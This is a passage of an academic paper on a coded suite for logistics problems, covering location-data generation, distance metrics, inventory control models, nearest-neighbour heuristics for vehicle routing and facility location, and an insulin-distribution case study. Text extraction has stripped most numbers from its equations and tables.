set of locations (standard test instance). there are available different sets of test instances for research within the distribution field. however, many of them are not adjusted to geographic coordinates. this can affect the process to estimate distance metrics in kilometers. figure presents the visualization of coordinates from the instance d of the database tsplib (reinelt, ). as presented, the range of the x and y axes are different from those presented in fig. . these non-geographical coordinates can be converted by using the following equation: v ¼ maxnew � minnew maxold � minold � � � ðv � maxoldÞ þ maxnew; ( ) where v is the value within the old range and v′ is the converted value within the new range. eq. ( ) is computed by the function rescaling of the coded suite. as presented in fig. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the location data from the instance d is correctly converted into geographic coordinates. � second, by using a probability distribution. in this case, random coordinates can be generated by using distributions such as the uniform distribution with parameters a and b which represent the minimum and maximum values for the generation range, or the normal distribution where a and b represent the mean and standard deviation values within the generation range. figure presents n = geographic coordinates considering these distributions. this data was generated by the function generatedata of the coded suite. in addition to location data, information regarding demands of locations and capacities of vehicles and warehouses must be generated for routing and coverage problems. by assuming a homogeneous fleet/set of warehouses a unique value is assigned to each of these elements. however, this does not necessarily apply to the demands of the locations to be served. some instances have considered homogeneous demand (same value for all locations). however, in practice, this is not considered. the function rescaling includes additional code to generate random demand for each location. note that, within the demand context, the first location is considered to be the central depot or warehouse, thus, demand is equal to zero. a note on the current approach to generate geographic data while test location data is generated by mathematical methods such as in diaz-parra et al. ( ), in recent years, obtaining geographic location data, also known as geo-location data, has been facilitated by the use of smart phones with integrated global positioning system (gps) receivers. in the market there are diverse software development kits (sdks) and application programming interfaces (apis) to process this data for mapping, route planning and emergency tracking purposes. among these, the google maps© and arcgis© systems can be mentioned (google llc, ; environmental systems research institute, ). as geo-location data is mainly obtained from smart phones and other mobile devices used by people and organizations, using and sharing this data by developers of geographic information system (gis) applications has been the subject of debate and discussion. this is due to concerns regarding the privacy and confidentiality of this data (richardson, ; blatt, ). although security technology and government regulations are frequently developed and established to ensure the ethical use of geo- location data, publicly available databases are the main resource for academic and research purposes. recently, more benchmark instances are generated for vehicle routing problems (uchoa et al., ) which can be adapted to geographic data with the coded suite. nevertheless, within the context of industry . , the computational proficiency on gis applications may become an important requirement and advantage for future logistic professionals and/or academics. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ distance metrics within distribution problems, a metric to determine the suitability of a route over other routes is required. the most common criteria to optimize distribution problems is to minimize the metric of distance which is positively associated to transportation costs. there is a wide set of distance metrics, being the euclidean distance the most commonly figure world map displaying the range for longitude (λ) and latitude (φ) coordinates in degrees. full-size doi: . /peerj-cs. /fig- rescaling function figure coded suite: re-scaling and plotting of existing location data with the function rescaling. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ used. other metrics, such as manhattan distance or arc length are more closely associated to real-world contexts (reinelt, ). figure presents the widely known mathematical formulations to compute these distance metrics. within the coded suite, these metrics are computed by the function distmetrics. it is important to remember that the distance is computed between two points i and j, thus, the x and y coordinates, or longitude (λ) and latitude (ϕ) coordinates, must be known in advance. an important resource for any distribution problem is known as the distance matrix a which stores all distances between each location i and j within the distribution network. thus, this matrix, of dimension n × n (where n is the number of locations, including the central depot) stores each dij data where i, j = ,…, n and dii = djj = (the distance between each point and itself is zero). the function distmetrics also computes the symmetric distance matrix (dij = dji) for each type of metric. uniform distribu�on a b c d e figure coded suite: generation of n geographic coordinates and plotting with the function generatedata. (a) data generated with uniform distribution (a = − and b = − for longitude, a = and b = for latitude). (b–e) data generated with normal distribution with mean values a = − and a = for longitude and latitude respectively. variability of standard deviation is represented by b = z and b = z for longitude and latitude respectively, where z varies from ± . to ± . and represents the number of standard deviations for dispersion. full-size doi: . /peerj-cs. /fig- a b c figure mathematical formulations to compute (a) euclidean, (b) manhattan, and (c) arc length distances between two location points. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by considering the converted coordinates into longitude and latitude degrees, the euclidean and manhattan distances provide similar values. in this regard, these values do not represent kilometers. in order to obtain a distance in kilometers, the arc length metric is considered. this metric considers the spherical model of the earth’s surface which has a radius of , km. for this, the coordinates in latitude and longitude degrees are converted into radians by a factor of π/ °. this leads to a symmetrical distance matrix in kilometers. it is important to note that an approximation of the manhattan distance can be estimated in terms of the arc length or euclidean distance by considering trigonometry and right triangles theory. by knowing the angle θ between the hypotenuse and one of the catheti, and the length or magnitude of the hypotenuse (i.e., euclidean or arc length dij), the length of both catheti can be estimated as: c ¼ dij � sinðuÞ; ( ) c ¼ dij � cosðuÞ: ( ) thus, if the euclidean or arc length metric is available, then the manhattan distance can be estimated as c + c . different estimates can be obtained based on the assumed value for θ. finally, an asymmetric distance matrix (dij ≠ dji) can be computed by adjusting the function distmetrics to represent dji = dij + unifrnd( , mean(dij)). note that this operation modifies dji by adding to dij a random uniform value within the range from to the mean value of all distances within a (although a different random value can be added). a note on distance metrics the type of distance or cost metric is one of the main aspects of distribution problems because it is correlated to the accuracy of their solution. diverse sdks and apis are currently used to estimate the asymmetric/symmetric distances and/or times between locations considering the actual urban layout and traffic conditions. tools such as google maps© and waze© perform these tasks in real-time on computers and mobile devices. nevertheless, construction of a distance matrix may require a large number of gis queries (n × n − n) which are frequently restricted by the license terms of the sdk/api. also, there are concerns regarding the privacy and confidentiality of this data as routing patterns are sensitive information. thus, mathematical formulations are considered to estimate these metrics in a more direct way for the development of methods to solve distribution problems. among other distance metrics the following can be mentioned: � ellipsoidal distance, which is the geodesic distance on the ellipsoidal earth (mysen, ). it is based on the assumption that the ellipsoid is more representative of the earth’s true shape which is defined as geoid. while the spherical model assumes symmetry at each quadrant of the earth, the ellipsoidal model assumes the associated asymmetry and the implications for route and facility location planning (cazabal-valencia, caballero-morales & martinez-flores, ). caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � geodesic distance on riemannian surfaces, which in general terms can estimate different curvatures and disturbances on the earth’s surface for route and facility location planning (tokgöz & trafalis, ). inventory control inventory management is an important aspect of distribution as proper inventory levels are required to ensure the constant supply of goods. this however must comply with restrictions to avoid unnecessary costs associated to inventory supply processes. in this regard, the term economic order quantity (eoq) has been used to define the optimal lot size q which is required to minimize inventory management costs such as those associated to ordering and holding goods through the supply chain. determination of q may become a complex task due to the different variables involved in the inventory supply processes such as costs, delivery times, planning horizon, cycle time, stock-out costs and probabilities, service levels, demand patterns (thinakaran, jayaprakas & elanchezhian, ). thus, different mathematical models have been developed to determine the eoq considering these multiple variables (thinakaran, jayaprakas & elanchezhian, ; braglia et al., ; de & sana, ; hovelaque & bironneau, ). in this context, depending of the variability of the demand patterns (as measured by a coefficient of variability cv = σ/μ, where σ and μ are the standard deviation and mean of the demand data respectively) there are inventory control models for deterministic and non-deterministic demand. if demand follows an almost constant pattern with small variability (cv < . ) it is assumed to be deterministic, otherwise it is non-deterministic (cv ≥ . ). in practice, demand is frequently non-deterministic, and two of the most useful inventory control models for this case are the continuous and periodic review models. these models, also known as the (q, r) (hariga, ; adamu, ) and p (lieberman & hillier, ) models respectively, are analyzed in the following sections. continuous review model the (q, r) model considers the costs and variables described in table . with these parameters and variables, lots of size q are ordered through a planning horizon to serve a cumulative demand. figure presents an overview of the supply patterns considered by this model and its mathematical formulation to determine q, r, and the total inventory costs associated to it. as presented, at the beginning of the planning horizon, the inventory level starts at r + q. this is decreased by the daily or weekly demand estimated as d. if historical demand data is available, it can be used to provide a better estimate for d. as soon as the inventory level reaches r, the inventory manager must request an order of size q because there is only stock to supply lt days or weeks. here, it is important to observe that the inventory must be continuously reviewed or checked to accurately detect the re-order point r and reduce the stock-out risk during the lt. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ because uncertain demand is assumed, the inventory consumption rate is different throughout the planning horizon. hence, r can be reached at different times. this leads to inventory cycles t of different length. for this model, the function continuousreview computes the lot size q, the reorder point r, and the total inventory cost. this function also generates random demand test data table parameters and variables of the (q, r) inventory control model. variable description c purchase cost per unit of product co order cost per lot q ch holding cost per unit of product in inventory p stock-out cost per unit of product r reorder point (level of inventory at which a lot of size q must be ordered to avoid stock-out) d average daily demand of products, or average demand of products on the smallest unit of time σ standard deviation of the average daily demand of products (it must be estimated on the same unit of time as d) μlt average demand of products through the lead time (lt). it can be estimated as d × lt if both are on the same unit of time σlt standard deviation of products through the lt. it can be estimated as r � ffiffiffiffiffiffi lt p if both are on the same unit of time d cumulative demand through the planning horizon. if d is a weekly demand, then d = k × d where k is the number of weeks within the planning horizon l(z) loss function associated to r figure continuous review (q, r) model. (a) inventory supply pattern. (b) iterative algorithm to estimate q and r. (c) mathematical formulation of the total inventory costs. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (dtest) to plot the inventory supply patterns obtained with the computed parameters q and r. dtest is generated through the expression: dtest ¼ d � ws ( ) where w is the number of standard deviations and it is randomly generated within a specific range. note that q and r are estimated from historical data (d, σ) and an specific z as computed by the iterative algorithm described in fig. b. thus, if test data is generated with a higher variability (i.e., with w > z) the model can provide an useful simulation to determine the break point of the strategy determined by q and r. figure presents examples considering w ∈ [− , + ], w ∈ [− , + ], and w ∈ [− , + ] for a case with d = and σ = (cv = . ). as presented, by considering demand with the mathematical limit of [− , + ] standard deviations (as defined by the standard normal distribution) the model is able to avoid stock-out events. however, if much higher variability is considered stock-out a b c stock-out figure coded suite: performance of the continuous review (q, r) strategy with different variability conditions as computed by the function continuousreview. (a) test demand data generated with w ∈ [− , + ] standard deviations. (b) test demand data generated with w ∈ [− , + ] standard deviations. (c) test demand data generated with w ∈ [− , + ] standard deviations. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (by far, higher than the input data for estimation of q and r), the parameters of the model are not able to avoid stock-out events. also note that, as variability increases the consumption rate is faster, thus more orders must be requested. thus, for w ∈ [− , + ] five orders were needed while for w ∈ [− , + ] and w ∈ [− , + ] six orders were needed. this corroborates the validity of this method for inventory control under uncertain demand and assessment of scenarios with higher variability. periodic review model the p model considers the costs and variables described in table . figure presents an overview of the supply patterns considered by this model and its mathematical figure periodic review (p) model. (a) inventory supply pattern. (b) mathematical formulation to estimate q at each period. (c) mathematical formulation of the total inventory costs. full-size doi: . /peerj-cs. /fig- table main parameters and variables of the (q, r) and p models. variable description co order cost per lot q ch holding cost per unit of product in inventory t time between inventory reviews and t > lt d average daily demand of products, or average demand of products on the smallest unit of time d cumulative demand through the planning horizon. if d is a weekly demand, then d = k × d where k is the number of weeks within the planning horizon σ standard deviation of the average daily demand of products (it must be estimated on the same unit of time as d) z number of standard deviations associated to a service level caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ formulation to determine q and the total inventory costs associated to it. in contrast to the (q, r) model, in the p model the inventory review is performed at fixed intervals of length t and q is estimated considering the available inventory i at that moment. thus, different lots of size q are ordered depending of the available inventory at the end of the review period t. for this model, the function periodicreview computes the lot size q and the total inventory cost. this function also generates random demand test data (dtest) to plot the inventory supply patterns obtained with the computed parameter q. as in the case of the (q, r) model, fig. presents examples considering w ∈ [− , + ], w ∈ [− , + ], and w ∈ [− , + ] for the variable demand rate. here, the advantages of the (q, r) model are evident for demand with high variability. at the moment of review (at the end of t), the lot size q − i is estimated based on the stock-out a b c stock-out figure coded suite: performance of the periodic (p) strategy with different variability conditions as computed by the function periodicreview. (a) test demand data generated with w ∈ [− , + ] standard deviations. (b) test demand data generated with w ∈ [− , + ] standard deviations. (c) test demand data generated with w ∈ [− , + ] standard deviations. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ historical data modeled through d and σ. this lot size must be able to cover the demand for the next period t + lt. however, this increases the stock out risk because ordering is restricted to be performed just at the end of t. thus, if during that period the demand significantly increases (more than that modeled by σ), inventory can be consumed at a higher rate. for the considered example, the required service level was set to . %. by assuming normality, the z-value associated to this probability is approximately . . thus, for demand with w ∈ [− , + ] standard deviations, the q estimated by the p model is marginally able to keep the supply without stock-out. as presented in fig. , with higher variability there are more stock-out events. thus, it is recommended to re-estimate the q parameter considering the updated demand patterns during the previous t + lt (i.e., update d and σ). these observations are important while evaluating inventory supply strategies. a note on inventory control models the analysis of the (q, r) and p models provide the basics to understand most advanced models as they introduce the following key features: uncertain demand modeled by a probability distribution function (i.e., normal distribution), quantification of stock-out risks, fixed and variable review periods/inventory cycle times, cost equations as metrics to determine and evaluate the optimal lot policy, and the use of iterative algorithms to determine the optimal parameters q and r. extensions on these models are continuously proposed to address specific inventory planning conditions such as: perishable products (muriana, ; braglia et al., ), new products (sanchez-vega et al., ), seasonal demand (lee, ), quantity discounts (darwish, ; lee & behnezhad, ), disruptions (sevgen, ), and reduction of co emissions (caballero-morales & martinez-flores, ). by reviewing these works, the need to have a proper background on mathematical modeling (i.e., equations and heuristic algorithms) and computer programing is explicitly stated, providing support to the present work. solving methods for routing and facility location problems standard approaches of operations research (or) such as mixed integer linear programming (milp) or dynamic programming (dp) are often of limited use for large problems due to excessive computation time (zäpfel, braune & bögl, ). thus, meta-heuristics have been developed to provide near-optimal solutions in reasonable time for large production and logistic problems. as introductory meta-heuristic, this work is considering two integrated local search algorithms with the fundamentals of greedy randomized adaptive search procedure (grasp) and nearest-neighbor search (nns). a complete review of more complex meta-heuristics and solving methods for different vehicle routing/facility location problems can be found in basu, sharma & ghosh ( ), prodhon & prins ( ) and bräysy & gendreau ( a, b). caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for the development of the integrated local search algorithms it is important to identify the characteristics of the vehicle routing/facility location problems and their solutions. this is discussed in the following sections. vehicle routing problem in this problem, a vehicle or set of vehicles departs from a single location where a depot or distribution center is established. these vehicles serve a set of locations associated to customers/suppliers to deliver/collect items. if each vehicle has finite capacity then the vehicle’s route can only visit those customer/ supplier locations whose requirements do not exceed its capacity. this leads to define multiple routes to serve unique sets of customer/supplier locations where each location can only be visited once. optimization is focused on determining the required routes and the visiting sequence to minimize traveling distance and/or costs. figure presents an overview of the capacitated vrp (also known as cvrp). for this work, two main tasks are considered to provide a solution: partitioning and sequencing of minimum distance. partitioning can be applied over a single total route to obtain sub-routes served by vehicles of finite capacity. sequencing then can be applied over a set of customer locations to determine the most suitable order to reduce traveling time/distance. this can be applied on the single total route and on each sub-route. the coded suite includes the function nnscvrp which implements a nearest neighbor search (nns) approach for the sequencing and partitioning tasks. this is performed as follows: � first, sequencing through the nearest or closest candidate nodes within a distance “threshold” is performed. this “threshold” is computed by considering the minimum distances plus the weighted standard deviation of the distances between all nodes or locations. � second, the total partial route obtained by the nns sequencing is then partitioned into capacity-restricted sub-routes by the sub-function partitioning . � third, the sub-function randomimprovement is executed on the total partial route obtained by the nns sequencing, and on each sub-route generated by the function d d d d d d d d r r r + ≤ + ≤ + + ≤ di = demand of customer i, depot located at i = = capacity of vehicle/route j solution figure characteristics of the capacitated vehicle routing problem (cvrp). full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ partitioning . this sub-function performs exchange and flip operators on random sub- sequences and points within each route/sub-route following a grasp scheme. finally, the function nnscvrp plots the locations, the total route, and the cvrp sub- routes for assessment purposes. figure presents the results obtained for the instance x-n -k .vrp with euclidean distance. the instance consists of nodes (i.e., customer/demand locations and one central depot location) and homogeneous fleet with capacity of . as observed, the function nnscvrp defined sub-routes which is the optimal number as stated in the file name of the instance. an important aspect of any solving method, particularly meta-heuristics, is the assessment of its accuracy. the most frequently used metric for assessment is the % error gap, which is computed as: %e ¼ a � b b � � � : ( ) where a is the result obtained with the considered solving method and b is the best- known solution. for the present example, the best-known solution is , . while the described nns algorithm achieved a solution of a = , . . hence, the error gap is estimated as . %, which is very close to the best-known solution. also, this result was obtained within reasonable time ( . s). a note on solving methods for the cvrp the cvrp is one of the most challenging problems within the logistic field due to its np-hard complexity and relevance to distribution performance. thus, there are two main research contexts for the cvrp: � problem modeling: within this context the following extensions can be mentioned: cvrp with two-dimensional ( d) and three-dimensional ( d) loading constraints (wei et al., ; tao & wang, ), cvrp with traffic jams (mandziuk & swiechowski, ), cvrp with carriers (rojas-cuevas et al., ), vrp with carbon emissions (liu et al., ), and cvrp with alternative delivery, pick-up and time windows (sitek et al., ). � problem solving: frequently, the solving method is proposed with the model of the problem. due to the complexity of the cvrp itself, most of the solving methods are based on meta-heuristics such as: particle swarm optimization (pso) (hannan et al., ), quantum immune algorithm (qia) (liu et al., ), matheuristics (archetti & speranza, ), tabu-search (ts) (tao & wang, ) and genetic algorithms (ga) (mulloorakam & nidhiry, ), with hybrid methods showing better performance. to design and test meta-heuristics, it is recommended to have basic proficiency regarding the general structure of a meta-heuristic method (i.e., construction and improvement processes) and its implementation through computer programing (i.e., coding in c++, matlab, python). in this aspect, the suite code nnscvrp can provide caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ both resources. more information regarding vrp models and solving methods can be found in toffolo, vidal & wauters ( ), archetti & speranza ( ) and baldacci, mingozzi & roberti ( ). facility location problem in this problem, it is required to determine the most suitable location for a facility or set of facilities (multi-facility location problem, mflp) to serve a set of customers/ suppliers. as in the cvrp, if capacity is considered for the facilities, multiple facilities are required to serve unique sets of customer/supplier locations where each location can only be served by a unique facility. if facilities are located at the location of minimum distance to all customers/suppliers, the mflp is known as the capacitated weber problem (aras, yumusak & altmel, ). however, if facilities are located at the average locations between all customers/suppliers (i.e., at the centroids), the mflp is known as the capacitated centered clustering problem (cccp) (negreiros & palhano, ). finally, if facilities are located at already defined median locations, the mflp is known as the capacitated p-median problem (cpmp) (stefanello, cb-de-araújo & müller, ). figure presents an overview of these variations of the mflp. it is important to observe that the feature of the locations has a direct effect on the solution. facility location problems are frequently solved through clustering or classification methods. within the coded suite, the function nnscccp performs a nearest neighbor search (nns) algorithm with an appropriate capacity-restricted assignment algorithm to provide a very suitable solution. this is performed as follows: � first, it generates a feasible initial solution through the sub-function random_assignment. randomness is considered when two or more nodes are located at the same distance unconnected node “ ” total single route cvrp sub-routes partitioning + random improvement (exchange/flip operators) connected node “ ” figure coded suite: solution of the nns-grasp meta-heuristic for the cvrp instance x-n -k .vrp as computed by the function nnscvrp. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from a centroid, and on the initial location of the centroids. this adds flexibility to the assignment task and to the search mechanism of the nns algorithm. � second, the initial solution is improved through the sub-function update_centroids_assignment. � third, if the solution generated by update_centroids_assignment complies with all restrictions and its objective function’s value is better than a reference value, then it is stored as the best found solution. when solving combinatorial problems, it is always recommended to verify the correctness of the solution. it is also recommended to know the convergence patterns of the solving algorithm. both aspects provide insights regarding hidden mistakes in the computer code and deficiencies in the search mechanisms of the solving algorithm (e.g., fast or slow convergence to local optima). to address this issue, at each iteration of the nns algorithm, the function nnscccp executes a verification and a backup routine for the best solution’s value. the purpose of the backup routine is to provide data for convergence analysis. figure presents the verified results of the function nnscccp for the cccp instance sjc .dat considering euclidean distance. the instance consists of nodes (i.e., customer/demand locations), centroids (i.e., facilities to be located) and homogeneous capacity of . finally, the accuracy of this solution is assessed through eq. ( ). the nns solution, which is plotted in fig. , leads to a total distance value of a = , . while the best- known solution leads to b = , . . then, the error gap is estimated as . % which is within the limit of . % for the cccp. the consideration of randomness within the search mechanism of the nns algorithm is common to most meta-heuristic solving methods. convergence is dependent of this aspect, thus, assessment of meta-heuristics is performed considering different cccp instances and multiple executions. if the coefficient of variability of results through multiple executions is within . it can be assumed that the meta-heuristic is stable. figure presents an example of this extended assessment scheme considering instances from the well-known sjc and doni databases. after executions of the meta-heuristic (as performed in chaves & nogueira-lorena ( , )), the coefficient of variability (cv), the best, worst and average results are obtained to estimate their associated error gaps from the best-known (bk) solutions of the test instances. as observed, the cv is very small, less than . % for all instances, hence the algorithm is stable. thus, a very suitable solution can be obtained within a few executions of the algorithm, which for all instances (except doni ) is within the error gap of . %. other assessment schemes can consider the execution time, time to best solution, and average computational times. this is specific for the assessment of new solving methods. logistic research is continuously extended in both important fields: (a) mathematical modeling of problems, and (b) adaptation and development of new solving methods. as presented, this work can provide the basis and resources for these research fields. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ba figure coded suite: solution of the nns meta-heuristic for the cccp instance sjc .dat as computed by the function nnscccp. (a) assignment of customers to centroids. (b) convergence of best found solution. full-size doi: . /peerj-cs. /fig- d d d d d d d d d d d c c c di = demand of customer i, depot located at i = , = capacity of facility j d d d d d d d d d d d solution d d d d d d d d d d d c c c d d d d d d d d d d d c c c + + + + ≤ + + ≤ + + ≤ weber problem cccp cpmp + a b c figure characteristics of the capacitated facility location problem (cflp). (a) capacitated weber problem. (b) capacitated centered clustering problem (cccp). (c) capacitated p-median problem (cpmp). full-size doi: . /peerj-cs. /fig- average best worst sjc . . . . . . . . . . . . . . . sjc . . . . . . . . . . . . . . . sjc a . . . . . . . . . . . . . . . sjc b . . . . . . . . . . . . . . . sjc a . . . . . . . . . . . . . . . sjc b . . . . . . . . . . . . . . . doni . . . . . . . . . . . . . . . doni . . . . . . . . . . . . . . . doni . . . . . . . . . . . . . . . doni . . . . . . . . . . . . . . . doni . . . . . . . . . . . . . . . sjc . . . . . . . . . . . sjc . . . . . . . . . . . sjc a . . . . . . . . . . . sjc b . . . . . . . . . . . sjc a . . . . . . . . . . . sjc b . . . . . . . . . . . doni . . . . . . . . . . . doni . . . . . . . . . . . doni . . . . . . . . . . . doni . . . . . . . . . . . doni . . . . . . . . . . . instance instance n p bk executions of the nns algorithm executions of the nns algorithm error gap (%) cvbkpn figure extended data for assessment of the nns algorithm for cccp. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a note on solving methods for the mflp as with the cvrp, the mflp is also of np-hard complexity and it is very relevant to distribution performance. main research is performed on the following contexts: � problem modeling: within this context the following extensions can be mentioned: k-balanced center location problem (davoodi, ), multi-facility weber problem with polyhedral barriers (akyüz, ), multi-commodity multi-facility weber problem (akyüz, Öncan & altinel, ), multi-facility location-allocation problem with stochastic demands (alizadeh et al., ), p-center flp with disruption (du, zhou & leus, ), and mflp models for waste management (adeleke & olukanni, ). � problem solving: due to the complexity of the mflp itself, most of the solving methods are based on meta-heuristics such as: parallel genetic algorithms (p-ga) (herda, ), adaptive biased random-key genetic algorithm (abrkga) (chaves, gonçalves & nogueira-lorena, ), and spatial optimization (yao & murray, ). most recently, the use of game theory concepts has been proposed such as nash equilibria for mflp with competition (pelegrin, fernandez & garcia, ). to extend on these works, it is recommended to have basic proficiency regarding the general structure of a meta-heuristic method and its implementation through computer programing. the suite code nnscccp can provide both resources. application case in this section an integrative case is presented to illustrate the application of the coded suite. this case is focused on the distribution of insulin, which is a vital product for people with chronic diseases such as pancreatic insufficiency or diabetes. this is because the main function of insulin is to regulate the concentrations of glucose and lipids in the blood stream. if there is a deficiency of insulin, the body cannot process these elements efficiently, leading to liver and kidney failure, damage to nerve cells, cognitive impairment, blindness and amputations (olivares-reyes & arellano plancarte, ; berlanga-acosta et al., ). currently, the demand of insulin is increasing due to the high levels of diabetes (type and type ) within the general population (mora-morales, ; tsilas et al., ). frequently, people need different insulin prescriptions, and sometimes more than one person within a region needs insulin. this leads to variable demand patterns through the general population, and distribution must be planned accordingly to supply all demands. to address the associated logistic problem, the following steps are considered: a) design a test instance with the two main features of the considered scenario: large demand locations within a geographic region, and demand patterns per location considering the characteristics of the distribution fleet and product. operational costs associated to inventory management must be also designed for the considered product. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ b) adapt the most appropriate routing model to formulate the distribution problem with inventory control to supply the considered product within a planning horizon. c) adapt the most appropriate inventory control model to establish the distribution frequency through the planning horizon with minimization of costs. d) select an appropriate solution method for the problem and analyze the results. e) discuss on potential opportunities to improve the solution. the details of these steps are presented in the following sections. (a) design the test instance by using the function generatedata a set of normally-distributed location points, were generated. then, by using the function rescaling these points were located within a specific geographic region. this methodology to generate the test instance is similar to the one proposed in diaz-parra et al. ( ) for the oil platform transport problem (optp) which is a variant of the cvrp (diaz-parra et al., ). from field data, the fleet of a regional distribution center for medicines typically consists of – standardized vehicles with temperature control. for this case, an homogeneous fleet of seven vehicles was considered for the set of location points, and the distribution center was located at λ = − . and ϕ = . . the capacity of each vehicle was defined considering the characteristics of the product which consists of a pre-filled injection pen of ml with ui/ml ( insulin units per pen) with an approximate cost of c = usd and dimensions . × . × . = . m . by considering . m as the capacity of the vehicle’s container for insulin, its capacity in terms of the product was estimated as . / . = units. finally, a planning horizon and reliable source data were considered to determine the demand patterns for the set of locations. the daily insulin dosage reported in islam-tareq ( ) was considered as input data for a monte carlo simulation model to provide statistical data (μ = mean units, σ = standard deviation units) regarding the cumulative demand for a -weeks planning horizon. then, this statistical data was expressed in terms of units of products as each pen contains insulin units. for reference purposes, an example of the geographic and demand data for the test instance of locations points is presented in table and table respectively. the complete data is available within location_data.xlsx and extended_demand_data.xlsx. (b) adapting the appropriate routing model due to the characteristics of the input data, the cvrp was identified as the reference routing model. in this regard, there are variations of this model which can be applied on the application case such as the periodic vrp (pvrp) and the time-windows vrp (twvrp) (francis, smilowitz & tzur, ). however, the standard cvrp was suitable for the application case as the distribution planning must be performed accordingly to the frequency of inventory replenishment. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by defining the cvrp as the routing model, the function distmetrics was used to compute the distance matrix in kilometers (arc length) which is the input data for the cvrp. because minimization of the inventory management costs is the main objective of the distribution scheme, the total inventory cost of the inventory control model (see figs. and ) was considered as the objective function. particularly, the order cost co is associated to the logistic operations of transportation and thus, it is directly associated to route planning and data from the distance matrix. in the following section, the integration of traveled distance (source data within the distance matrix) with co is described considering the appropriate inventory control model. (c) adapting the appropriate inventory control model as presented in table most of the demands have significant variability as their coefficients of variability (cvs) are bigger than . . this led to consider a non- deterministic inventory control model such as (q, r) and p. because the product’s distribution must be performed periodically (each weeks) it is recommended to synchronize it with the inventory supply frequency. for this purpose, the p model (periodic review) was considered as the most appropriate model because inventory replenishment through the (q, r) model depends of the re-order point which may be reached at different times. table example of location data (latitude, longitude) for the application case (generated by functions generatedata and rescaling). i λ ϕ … i λ ϕ − . . … − . . − . . … − . . − . . … − . . ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ − . . … − . . note: complete data is available within location_data.xlsx. table statistical data of units of end-product (pre-filled pens) requested by the application case: coefficient of variability cv = σ/μ (generated by monte carlo simulation). i μ σ cv … i μ σ cv . … . . … . . … . ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ . … . note: complete data is available within extended_demand_data.xlsx. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the following parameters were considered to adapt the p model to estimate the net requirements for the present case: t = one period of -weeks ( days), and lt = one day ( / = . of one period of -weeks). note that under this assumption, d = μ (see table ) and z = . for a service level of . %. regarding costs, co and ch were estimated from the point of view of the ordering entity (i.e., drugstores, small clinics, and patients at home). because ordering costs must cover the operating costs of the supplier which are dependent of the lot size and the service distance, co was estimated as: co ¼ ds � de � dj þ dp ( ) where ds is the diesel cost per liter, de is the efficiency of the vehicle (kilometers per liter), and dj is the cumulative distance up to the delivery point j (source data within the distance matrix). for a standard vehicle de was estimated as kilometers per liter and ds as . usd per liter (based on regional costs). because dj is directly associated to the traveled distance, its minimization was achieved through the application of the cvrp model (see function nnscvrp). then, ch was estimated as . % of c. table presents an example of the net requirements (lot size q) per location based on the p model considering a period between reviews of weeks (see function periodicreview). these results represent the final demand data for the cvrp model. the complete data is available within q_demand_data.xlsx. (d) solution method and analysis of results figure presents an overview of the coded suite’s functions used to provide a solution for the application case. by having the test instance data, the first set of results was obtained by solving the cvrp through the function nnscvrp. these results consisted of seven 